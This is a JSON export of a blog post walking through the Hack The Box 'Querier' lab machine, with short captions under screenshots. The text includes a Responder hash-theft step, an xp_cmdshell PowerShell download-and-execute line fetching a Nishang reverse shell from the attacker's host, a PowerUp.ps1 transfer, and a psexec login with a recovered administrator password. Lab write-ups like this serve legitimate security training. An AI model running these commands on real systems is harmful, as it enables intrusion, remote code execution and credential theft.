{"id":37,"date":"2021-02-10T10:05:57","date_gmt":"2021-02-10T10:05:57","guid":{"rendered":"https:\/\/areyou1or0.it\/?p=37"},"modified":"2021-02-10T10:06:20","modified_gmt":"2021-02-10T10:06:20","slug":"htb-querier-walkthrough","status":"publish","type":"post","link":"https:\/\/areyou1or0.it\/index.php\/2021\/02\/10\/htb-querier-walkthrough\/","title":{"rendered":"HTB &#8211; Querier Walkthrough"},"content":{"rendered":"\n<p>Nmap<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/IjJK3GjIjaw3lWtUAsBwHcOfNDPs9jQimOd6Po0FwMR-nAubpe6j95ZB9Vrbv2qRglNFzZUxZ_iWng1UJW6qWULazZu123ZyWeB0gpnXBIFjIqp84NrZV6LUJ9Qgkap2LVGRcoyC\" alt=\"\"\/><\/figure>\n\n\n\n<p>SMB Shares<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/iyGmJUF89_3hAhuDSY2MnZ90Ye1ZdzHEDSsT0dQqm8OMSNop6mAmbYXPTTQNyhUres01OJG2N2a2Ltg7iYgMQzoDU-Dn_VGfWScp-zJXtm1JiVeNu9Yosibs2th3F-JcT43KZsKx\" alt=\"\"\/><\/figure>\n\n\n\n<p>Get the file and unzip it<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/f6Vd5jGP5UFMGhDeL0yFVh_1PE4EYRMkfMMKvVS6kZclRol57MhM_bVuuX8BF6aA9VQsyGiGYBdvl1HIqYXYPkFp5QNd1tOzL7Vz50TTNCT6f97O5oHR9EpeMyElakxtJgPmbcU9\" alt=\"\"\/><\/figure>\n\n\n\n<p>SQL credentials found in vbaProject.bin<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/qwlD1mbPBRlcUxCYXqVmSYQXSlR1nQf0ledmPwf9QZqSglog7Eu0Np9EkbFXc73Y523FGT9XC3RiIsrk6nQaIwwgewIjFD84c4UKlVSeGXpXEVCZi1vOYHYrODTO0WvNFO8q4KJE\" alt=\"\"\/><\/figure>\n\n\n\n<p>Use Impacket's mssqlclient script to log in<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/stPKaTmlg7yE2pPmgaYXM1M-PUTr6qwS37qiE31OY_kzTtxVBRo9NDJ6mbna6W0IzVtdObNCJYR7--IK5R2GY69_ABHFazuxrPGylQxIf_XCOQOViokPVdHd-pBQvUauaxw47UTF\" alt=\"\"\/><\/figure>\n\n\n\n<p>Try to enable xp_cmdshell, but the current user is not privileged<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/HJ9XATPcB0jrrxHC2WbIcfNC7O_bAs1j4MoBp1sfkVW5a1sLmayLwXCRGr3-9GTpzx5p9TMUY1kNWJDejwQGrA72S2GjH4TetDAVBwqZaiMwpqmFzp3ka5ayiLUYY6nfpE2LHVOW\" alt=\"\"\/><\/figure>\n\n\n\n<p>Try to steal credentials by making the server call a fake share on your own host<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/CKvRDNOnex6dSGDlXZ_qlgZ7H62-hrP_aAZbMVNAx6FKKAdYnNRUO019o5yuuhx9uqDLLSpPsyrZjJKYAu7fK08HD50PvQC31qmzsUb7b4CoUHo8YDKGineIuMgYnT6NUfHkGZpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Listen with Responder<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/ebkuSDxqY82FLa346xTJlJjkHzO3_L5li18dJcvQRasmBSs0GGi_foqrpB7PEdHW0rIWYk1g2rBab6Ndntdzu81DLQ5aKm8qyC3vjvGGSSs7Jr1DyktDzQ6I1OIZXL2soL3eygBz\" alt=\"\"\/><\/figure>\n\n\n\n<p>Crack the hash with John<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/hb_bZ0HU4yXPvp0_Q-cd70HJFo2PeTa1vamUq8qb9E5z7tgbmE3DAgsK6-GK8yPT3OR6lKMg-PMtIzBmVo3ZKfNeitKVjCZK8lag5ctXrqS_pqEUL-nV7x7LYQz90iM2qX-cvWQe\" alt=\"\"\/><\/figure>\n\n\n\n<p>Log in again as the new user<br>mssqlclient.py mssql-svc@10.10.10.125 -db volume -windows-auth<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/paHzjATeHU46nYqgsuccb64lirdPCAYCm0PWGC2wvI9ND70qA5hrcuJ4MIAmJYKJfWsCDjumjf40oMU3eHlkl-J7GrIYvy36IE2ABxjYVObJJflDHTro9gKU6xsrC7w1qgoEqfFT\" alt=\"\"\/><\/figure>\n\n\n\n<p>Enable xp_cmdshell and now we have RCE<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/MjDV_ZuJk42JLQWDpDU3uGddkSLjeVWYzfZ-PndhcEq6FzCHGTRp7u7MFTLNX2WEfxqrOSVcVySdPTde65wVxuN977MrRJKgxoIvjRVnK0Dwpim1l-SgbSRYBhwV6O_4BhpCDd6g\" alt=\"\"\/><\/figure>\n\n\n\n<p>Download the Nishang reverse shell from your own box with a PowerShell command to get a reverse shell:<br><a href=\"https:\/\/raw.githubusercontent.com\/samratashok\/nishang\/master\/Shells\/Invoke-PowerShellTcp.ps1\">https:\/\/raw.githubusercontent.com\/samratashok\/nishang\/master\/Shells\/Invoke-PowerShellTcp.ps1<\/a><br>Add the following command at the end of the file:<br>Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.16 -Port 4444<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/L2t4not66arnZp4hWHUP_rS7_qUAVzwMmAqLqufddePQLxWb0xCAlzHu3Nk1_YX_vn4yT6TTY4T_1QzadEziYSdc4yyBquU6UJokcyEjvRrFDMmWX6qKZAnnhTVPvTCsbEh3KD6N\" alt=\"\"\/><\/figure>\n\n\n\n<p>Now execute the command on MSSQL to get a reverse shell:<br>EXEC xp_cmdshell powershell iex(new-object net.webclient).downloadstring(\\&quot;http:\/\/10.10.14.16:8000\/Invoke-PowerShellTcp.ps1\\&quot;)<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/0bWBPqzncUjyrPKr99T7sqrRuDPihgXUY8op3J3oIiOL9HKVWg1G3-Or71O8u3NMxpo9Lhiy4jHJ6y3lMYJmpdQU9t9JcvtliqSDQCjDJcNPi6Cstein0rNIhz7NPCEJPQmFep5_\" alt=\"\"\/><\/figure>\n\n\n\n<p>Privilege Escalation<br>Get the PowerUp.ps1 script onto your own box:<br>wget <a href=\"https:\/\/raw.githubusercontent.com\/PowerShellMafia\/PowerSploit\/dev\/Privesc\/PowerUp.ps1\">https:\/\/raw.githubusercontent.com\/PowerShellMafia\/PowerSploit\/dev\/Privesc\/PowerUp.ps1<\/a><br>Then send it to the Windows box:<br>Invoke-WebRequest 10.10.14.16:8000\/PowerUp.ps1 -OutFile c:\\users\\mssql-svc\\downloads\\PowerUp.ps1<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/PlH6_B1x8FytT1dzg7ftheQ46roTvh4wHGUk_oBgYRxXTWvLVgYS33hkPkPF4ZYsG7umNi4_5udjdTzwoeT0v48uGnQB9EW3hETu7D1gJQ0fisC0kDIJgzpUZD5hBO3oVfbwRFeH\" alt=\"\"\/><\/figure>\n\n\n\n<p>Run the script:<br>Import-Module .\\PowerUp.ps1<br>. .\\PowerUp.ps1<br>Invoke-AllChecks<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/n9YmblLFx0UvWb7zFYCTR9cwyugdK3IS8YqJLCZnQKxqoiHRWU0_9t4WROajDcl4Wm6GnAIExYy4IAjrRhE_R1WaJK_bZ84C04DPRI0bGu5aKtR-LkbLp4hZ3xcp7pgs6Hm8mjkU\" alt=\"\"\/><\/figure>\n\n\n\n<p>It will give us clear-text credentials from the GPP cache<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/9E1HFvQFnIwdzJBAnXU3HC7uFESBQk60D6lCwUIXGOQTWcIVhQkKa-_HEA2rb40pXX3SOxzZNGVNEGfvuU52Eomn5ifY4LuQsmtV1Mb8Q3v2cFhiXWCCo0wrQaHw2eGWPVQn5BvP\" alt=\"\"\/><\/figure>\n\n\n\n<p>psexec.py Administrator:'MyUnclesAreMarioAndLuigi!!1!'@10.10.10.125<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/mOWyhwiXADBtpddlxISb8usAyFg6XPFhbPtHls81Xp_X0lCkW_RjYBpXWanTq6w3q2J2Bly2pG06mE_6cAUzGmbeTdGL64Jq4VL8s2mx-OYSnosOUDt9ec-ZemEVK1mQGc0GEmUP\" alt=\"\"\/><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>Nmap SMB Shares Get the file and unzip it SQL credentials found in vbaProject.bin Use Impacket's mssqlclient script to log in Try to enable xp_cmdshell, but the current user is not privileged Try to steal credentials by making the server call a fake share on your own host Listen with Responder Crack the hash with John Log in again as&hellip; <a class=\"more-link\" href=\"https:\/\/areyou1or0.it\/index.php\/2021\/02\/10\/htb-querier-walkthrough\/\">Continue reading <span class=\"screen-reader-text\">HTB &#8211; Querier Walkthrough<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[17],"tags":[],"_links":{"self":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/37"}],"collection":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/comments?post=37"}],"version-history":[{"count":1,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/37\/revisions"}],"predecessor-version":[{"id":38,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/37\/revisions\/38"}],"wp:attachment":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/media?parent=37"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/categories?post=37"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/tags?post=37"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}